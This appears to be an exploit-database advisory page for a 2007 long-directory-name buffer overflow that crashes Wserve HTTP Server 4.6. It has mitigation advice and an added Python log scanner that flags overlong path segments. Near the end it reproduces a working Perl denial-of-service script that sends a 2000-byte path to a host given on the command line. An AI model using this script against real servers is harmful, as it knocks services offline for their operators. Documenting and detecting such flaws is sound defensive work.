Vendor: Wserve HTTP Server
By: UniquE-Key
CVSS: 7.5 (HIGH)
Type: Buffer Overflow - Denial of Service
CWE: 119
Product Name: Wserve HTTP Server
Affected Version From: 4.6
Affected Version To: 4.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow – Denial Of Service

This entry covers Wserve HTTP Server 4.6, which is vulnerable to a buffer overflow. The attacker sends an HTTP request whose path contains an overlong directory name (the PoC below uses about 2000 bytes), overrunning a fixed-size buffer in the server. The error text quoted in the PoC is the message the Visual C++ runtime prints when its buffer security check finds the stack cookie corrupted, so the process is terminated rather than allowed to continue: the result is a denial of service, since the program's internal state has been corrupted and it cannot safely resume execution.

Mitigation:

No vendor patch is available (Patch Exists: NO above), and the vendor should release one that fixes this buffer overflow. Until then, users should run an alternative HTTP server, or limit exposure with network-level controls: firewall the service to trusted clients, or place it behind a reverse proxy that enforces a maximum request-line and path-segment length so that overlong directory names never reach the vulnerable server.
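As a defender-side illustration of the mitigation above (an added example, not part of the original advisory or the Wserve project), the following Python scans access-log lines for requests whose path contains a single directory segment longer than a threshold, the pattern this PoC relies on. The log lines are constructed for the example; the 255-byte threshold is an assumption (a common filesystem name limit), and percent-encoded paths are decoded before measuring so an encoded variant is not missed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in NCSA "common" log style (not real traffic).
# Line 3 mimics the PoC on this page: a path made of ~2000 'A' bytes.
# Line 4 is the same idea percent-encoded (700 x "%41" decodes to 700 'A's).
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [05/Apr/2007:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 1024',
    '10.0.0.5 - - [05/Apr/2007:10:00:02 +0000] "GET /docs/manual/ HTTP/1.0" 200 2048',
    '10.0.0.9 - - [05/Apr/2007:10:00:03 +0000] "POST /' + "A" * 2000 + ' HTTP/1.1" 500 0',
    '10.0.0.9 - - [05/Apr/2007:10:00:04 +0000] "GET /' + "%41" * 700 + ' HTTP/1.1" 404 0',
])

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)"'
)


def longest_path_segment(target):
    """Return (length, segment) for the longest '/'-separated path segment.

    The query string is ignored (the PoC puts its payload in the path), and
    each segment is percent-decoded first so it is measured at the length the
    server sees after decoding, not at its on-the-wire length."""
    path = target.split("?", 1)[0]
    segments = [unquote(s) for s in path.split("/") if s]
    if not segments:
        return 0, ""
    seg = max(segments, key=len)
    return len(seg), seg


def find_long_segment_requests(log_text, max_segment=255):
    """Return one dict per log line whose path has a segment longer than
    max_segment (assumed threshold; the PoC's 2000 bytes is far above it)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        length, seg = longest_path_segment(m.group("target"))
        if length > max_segment:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "method": m.group("method"), "segment_len": length,
                         "prefix": seg[:16]})  # keep only a short prefix for the report
    return hits


if __name__ == "__main__":
    for hit in find_long_segment_requests(SAMPLE_LOG):
        print(hit)
```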

Exploit-DB raw data:

#!perl
# Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow - Denial Of Service
# Type :
# Buffer Overflow - Denial of Service
# Release Date :
# {2007-04-05}
# Product / Vendor :
# Wserve HTTP Server
# http://sourceforge.net/projects/whttp
# PoC :
# GET / HTTP/1.0\r\n /127.0.0.1:80/AAAAAA[2000]. 
# Error :
# Buffer Overrun Detected!
# Program:...~\Temp\Rar$EX00.906\wserve\wserve_console.exe
# A buffer overrun has been detected which has corrupted the program's internal state. The program cannot safely continue
# execution and must now be terminated

# Exploit :

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

my $unique = LWP::UserAgent->new;

# Target host taken from the command line, e.g. 127.0.0.1
my $address = shift or die("Insert A Target");

# Request path made of 2000 'A' bytes. The original used the bareword A,
# which only works without 'use strict'; it is quoted here.
# Note: the PoC comment above shows a GET, while the script sends a POST.
my $req = HTTP::Request->new(POST => "http://$address:80/" . "A" x 2000);

my $res = $unique->request($req);

print $res->as_string;

# Tested :

# --- Wserve HTTP Server 4.6 ---

# Vulnerable :

# --- Wserve HTTP Server 4.6 ---

# Author :

# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org

# milw0rm.com [2007-04-05]